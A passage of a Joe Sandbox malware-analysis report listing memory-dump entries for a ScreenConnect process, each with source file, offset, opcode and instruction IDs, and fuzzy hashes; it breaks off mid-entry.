                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0dfe284c9c2acfa5b8dd591c2429b57b14b2df76134523a0ab5d43c74d68dd80
                                                                                                                                                                                                  • Instruction ID: 83b1c6b78ddedeed040872d9a0aa23caf2ebe43d5ee4e53d9751c9816eaa9a73
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dfe284c9c2acfa5b8dd591c2429b57b14b2df76134523a0ab5d43c74d68dd80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8516370A0070DCFDB55EFB8C854AADBBB2FF84310F118699D515AB3A5DB709A85CB80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8f6ee5d0b458981f8226e804b0bd75c51072bfd98545fccaec8517e5811ac753
                                                                                                                                                                                                  • Instruction ID: 375af3ac6ab3f95de1bc106002bf93c2bd17e5769cc8314042fad791030443f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f6ee5d0b458981f8226e804b0bd75c51072bfd98545fccaec8517e5811ac753
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1510634600B05CFD725CF29D888A56B7F2FF8A324B258A5DE496CB7A4DB31E945CB40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ca548f71db2f8a4ae57e63bb28ae65ddbd71cbde0c63624f3ac2a34a9c595ec4
                                                                                                                                                                                                  • Instruction ID: 574c038db5f60802e9578b3c1fa7264f58162e822ee2a3004fb72ce182b7a5d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca548f71db2f8a4ae57e63bb28ae65ddbd71cbde0c63624f3ac2a34a9c595ec4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5951923070020A8FDB95EB39D95866E77E2AF88710B14846CD906DB3A5EF74DD01CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a5c168e5ff2fb2c7899d927c9fea294b302c6019c48a9248f94292dcc5424507
                                                                                                                                                                                                  • Instruction ID: f8061a42ae5c1239b6745d8a1259bda0b9d296097fbdc791e243c88ea73a01ec
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c168e5ff2fb2c7899d927c9fea294b302c6019c48a9248f94292dcc5424507
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A518970E403099FEB45DFB4D884BDDBBB1FF89310F108559E104AB294EB75A955CB60
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 09c921bfa783516cab791b75a601c86b656f6acec657776ca4e869b99f0ef7b0
                                                                                                                                                                                                  • Instruction ID: 58a04c85a74ade70a20695f25aac61e6325b91a5775c3633b5365d55197057e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c921bfa783516cab791b75a601c86b656f6acec657776ca4e869b99f0ef7b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2516770E402099FEB44DFB4D884BEDB7B2FF88300F108659E104AB294EB75A995CF90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 88b022226554cd2a83c1687adb3422fe579d2af84d8ea5e025e82b529b3de45b
                                                                                                                                                                                                  • Instruction ID: 76a66571675698cf614a974f3bf5781cf7de9fd1de23438514cae387999215ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88b022226554cd2a83c1687adb3422fe579d2af84d8ea5e025e82b529b3de45b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F541D135A00209CFDB56EF68D8946AEFB66FFC4310B15C129D906AB385DB30ED06CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ee31c6eac5ccb8428b5b025edb676f7a22e1c9c22e38156fe04ae11d8687a67c
                                                                                                                                                                                                  • Instruction ID: 0d761ff99dce3214688d519ba81ce0fcdb6f3e27303849151f4bbb311804d86d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee31c6eac5ccb8428b5b025edb676f7a22e1c9c22e38156fe04ae11d8687a67c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE418C30B10209CFCB55DF69D894AAEB7F6BF88314B158568E40AEB3A1DF709D45CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 700530855f5399e9d554c1f59da06719dd4aa81bdd049f617a61e63c08769845
                                                                                                                                                                                                  • Instruction ID: 15b7d69ccb13fb0122a3b54f5257c7cdfcde52b0a6185cb814c6f5d28a516f80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 700530855f5399e9d554c1f59da06719dd4aa81bdd049f617a61e63c08769845
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34418C71E003199FEB61DF69CC18BAABBB6FB45310F1081E9D60CA7280DB745A45CF92
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 17e3fc7b7694ac477d47dacb704f9e338b1eae299552f43e17f9376d8d7473e9
                                                                                                                                                                                                  • Instruction ID: 9bc38ec623dd5c9577e8d4eb0dee51d5337103bfc88b46e40f8b4ebcc3de6c4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17e3fc7b7694ac477d47dacb704f9e338b1eae299552f43e17f9376d8d7473e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D318431B002098FDB55DFA9C454AAEF7F6EF89354F108469E546E7390DB70EE058790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0f266d47a18831f9802ca1f6bc803b333c375056b7ce40e3bf3eac0f15ec1c4d
                                                                                                                                                                                                  • Instruction ID: 95f3d7744a0e7cfecf7b56226d1d4d0aea6acc77cf017ddc0d71f258d74fe7a4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f266d47a18831f9802ca1f6bc803b333c375056b7ce40e3bf3eac0f15ec1c4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94418B30B102098FCB55DF69D858AAEB7F6BF88714B11856CE40ADB3A1DF709D44CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1ac77a5bb5ae61195d0c830d84b49f131e61d75c9ba77f911514aa2075041df6
                                                                                                                                                                                                  • Instruction ID: 161252c9f00aaaf5f369294cecb61a28bc98b4ecb7595da4f478ab748d1b279f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ac77a5bb5ae61195d0c830d84b49f131e61d75c9ba77f911514aa2075041df6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25317A71D003099FDB14DFAAD844BEEFBF4EF89320F10846AD519A7240D778A9458FA5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 78a6645e7f397d59281612662006cde9f2aee41b879cf1da2a4b2387971384a1
                                                                                                                                                                                                  • Instruction ID: 379533060c1a54183fc0a51d8d24dd82eccdde732321e19ee4027ad7b7c4a914
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a6645e7f397d59281612662006cde9f2aee41b879cf1da2a4b2387971384a1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02311A346007058FD771DF29C844A6AB7F1AF89324B248A2CE466DB7A5E730E956CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 64eaf751b37202c363671d7750a1d8df0a1d35c17dec12b4f507f6b26fca1e02
                                                                                                                                                                                                  • Instruction ID: 279e4e737e9c36dfafd44cee9b03f31cd5703d7e5bde789b0251f63a7ae484bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64eaf751b37202c363671d7750a1d8df0a1d35c17dec12b4f507f6b26fca1e02
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00310970600709CFD771DFAAD84466AB7F1AF89324B104B1CD496CB6A5D770EA46CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ce0b84738ab184c2a41141d3a599cb8ad9bfeb2e1c7eceb28f425a26b3035347
                                                                                                                                                                                                  • Instruction ID: f942029ef2c528a3c93a644d88ebcced63ed64ec60f5aa425102c90138ded69f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0b84738ab184c2a41141d3a599cb8ad9bfeb2e1c7eceb28f425a26b3035347
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF314C34B00B098FD770CF29D888A66B7F1EF89324B144A1CD45ACB7A1D730EA45CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6d80169d8148c713bce0ca69548286fb629d5154b3b375fde3ee2539c21fd919
                                                                                                                                                                                                  • Instruction ID: 47c39b79e3e62b276f31f0041e72fff31bce0c389cb71f5a94c6f61f0bbc2b21
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d80169d8148c713bce0ca69548286fb629d5154b3b375fde3ee2539c21fd919
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5231E371A00309DFCB59EFB4D98866EBBB5FF49310B1085A5D919E7285DB309E01CB61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 331318337af3529ce99e817936e5cc56f9b92709877cb84dd42c348ae82d116b
                                                                                                                                                                                                  • Instruction ID: dbe496c0e5769b19b2bd1648b2c2a99bdbc310a8c4a4d07e0ef36f98deb1ab3e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331318337af3529ce99e817936e5cc56f9b92709877cb84dd42c348ae82d116b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC3107746007058FD771DFAAC84466AB7F1AF99324B108B2CD596DB7A1D730E946CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0a2ae9e0238339dbb2f010fe3d9e105f4332303b989604a2a1c1f3d28826ebcd
                                                                                                                                                                                                  • Instruction ID: 32557dcbfea561a74b2625e8f71b8837fb22bce83856ea2157e7c6f309b04875
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a2ae9e0238339dbb2f010fe3d9e105f4332303b989604a2a1c1f3d28826ebcd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871129713402044BD791E66EFD906AB77DAEFC0764714447AE60CCB390EE61DC018360
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d8ceb80529723a2996dee9c3100889d94e1d6e9590bb07e417fe722c212143de
                                                                                                                                                                                                  • Instruction ID: 3e74569f13c4dc273ea70b12526e3b57ca72770bacaf055f759a7f135990cb23
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8ceb80529723a2996dee9c3100889d94e1d6e9590bb07e417fe722c212143de
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 192142B6500244DFDB25DF84C9C0B26FF66FBC8324F6482A9E8090B647C336D456CBA2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 11095c3e722813aa8cb2981b6b8ce3859296e92c396b1839252cf3ae7ca4287e
                                                                                                                                                                                                  • Instruction ID: 737590264b588b4ddc28604568acf250652eb087250ac9d378081b8d44f96e38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11095c3e722813aa8cb2981b6b8ce3859296e92c396b1839252cf3ae7ca4287e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C511AF717003059BDB04FB64D894B6FB7A2EFD5200F508629D909AB788DF70AD1587D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f424bb44e53422ade3c507354cb53fab8f5c965c2c4d1fbb3ab25e9794e5e91a
                                                                                                                                                                                                  • Instruction ID: 4df6c2f6d805675f007f06b944c7019115d9402ec28d977a049be58de166447e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f424bb44e53422ade3c507354cb53fab8f5c965c2c4d1fbb3ab25e9794e5e91a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21C271A00215CFCB559FA8DD8866EBBF1FF48325B008565D915E7384DB309A01CB61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c1295941d102c0b67bf86ec84a2aa05a446955ee69015a430e610e02ae40282d
                                                                                                                                                                                                  • Instruction ID: f9a3dc21d227d142fa7a2337efc2d033d9b328cf816bf1a3b0d9697211e5fb14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1295941d102c0b67bf86ec84a2aa05a446955ee69015a430e610e02ae40282d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02211B34600609CFD735CF25D844596BBF1AF85320B108A2DD592976E5DB31EA9ACF90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c447fa801c1ff3cc3f1d2d502b74726622bb4fb73ef011b7afc644ebe329a17d
                                                                                                                                                                                                  • Instruction ID: 79b6d30d8c3d1c9ce2358162365337b30275c48901c3e586debcb31a0603d566
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c447fa801c1ff3cc3f1d2d502b74726622bb4fb73ef011b7afc644ebe329a17d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E21167680024EDFDB21CF9AD844ADEBBB5FB48310F14842AEA14A7250D379A655CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 05e63bbb2976282cd1541726affb43f6879c3136b90da5b37935ce888d39eccb
                                                                                                                                                                                                  • Instruction ID: 6ac491f6ff2d092eeb642e2dfd14248e0c54c158b1d389a05cf67475a3c4ff1b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05e63bbb2976282cd1541726affb43f6879c3136b90da5b37935ce888d39eccb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55210074A00709CFD769DF29D854A6ABBF5BF48310B10CA2CD5A6C7694D771EA05CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1e634524b5a4e364d0a6ea88ffa69090a193cccec5f0b5ba3a42a6d22c462218
                                                                                                                                                                                                  • Instruction ID: 456f4f801b2831f63020350c2f65fd1d71668b87599394adf094af627748b1de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e634524b5a4e364d0a6ea88ffa69090a193cccec5f0b5ba3a42a6d22c462218
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D119D31B003099BDB08FB64D844B6FB7A2EFD5210F508629D509AB388EF70AD0587E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 54ae2032765250e8c59f5440cb2070603e2d311da95f365fca7fc93b7a2f029f
                                                                                                                                                                                                  • Instruction ID: 7dd0f7d57bc8bba3b1c11b02cf9af7515ba716e41aa1b52f82755f5e794c0018
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54ae2032765250e8c59f5440cb2070603e2d311da95f365fca7fc93b7a2f029f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51114270B002099FCB01EF65DC859AFB7B5FFC9210B508529E519DB354EB30ED058B95
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12d06f73572069778f4500a3c51e36f6ee4b859a860146db6f5b9b96b14a2fbc
                                                                                                                                                                                                  • Instruction ID: 73462b5d7e6b0818b907a35f00221208856f7f527e9c6509862d55dce6a59624
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12d06f73572069778f4500a3c51e36f6ee4b859a860146db6f5b9b96b14a2fbc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8111931A006098FDB25DF59C959BAFBBF5AF89305F14486DD406EB390DB719E048B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                                                                                                  • Instruction ID: e05167870f72eb9b8d88c4f4711a63c311b399c4a6d60e9fe7167c7cd9eaaacd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B911AFB6504284CFCB16CF54D9C4B56FF72FB88314F2886A9D9090B657C336D45ACBA2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e98553698a253aad39cfed28c0ee32ced541a1d1ca60760daa55c487bab0c9a9
                                                                                                                                                                                                  • Instruction ID: 67bfbf6d2ff46a2d7d7c172977d05d0194f380a7f37420316cca2c219471fb5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e98553698a253aad39cfed28c0ee32ced541a1d1ca60760daa55c487bab0c9a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B72103B5C007499FDB10CF9AD844BEEFBF4EB48324F15842AD919A7240D3B8A645CFA5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
